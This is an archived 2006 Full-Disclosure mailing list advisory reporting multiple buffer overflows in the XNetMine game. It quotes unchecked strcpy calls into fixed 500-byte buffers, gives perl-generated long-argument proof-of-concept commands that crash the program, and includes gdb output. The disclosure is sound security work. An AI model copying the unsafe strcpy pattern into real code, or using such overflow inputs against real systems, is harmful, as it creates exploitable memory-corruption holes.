| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <45360D9B.3010602@autistici.org>
Date: Wed, 18 Oct 2006 13:18:51 +0200
From: Federico Fazzi <federico@...istici.org>
To: vulnwatch@...nwatch.org, full-disclosure@...ts.grok.org.uk
Subject: XNetMine (no version) multiple buffer overflow.
//
Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz
*Vulnerable code:*
--
line: 672/676
if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
strcpy(text,argv[t+1]);
strcpy(Port,&text[11]);
}
--
line: 677/682
if (strncmp("-Name",argv[t+1],5)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(User,&text[5]);
}
--
line: 683/688
if (strncmp("-ServerName",argv[t+1],11)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(ServerName,&text[11]);
}
--
*Proof of concept:*
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--
*Debug information:*
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()
-- federico
federico@...gs.it / http://defsol.plugs.it/
//
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists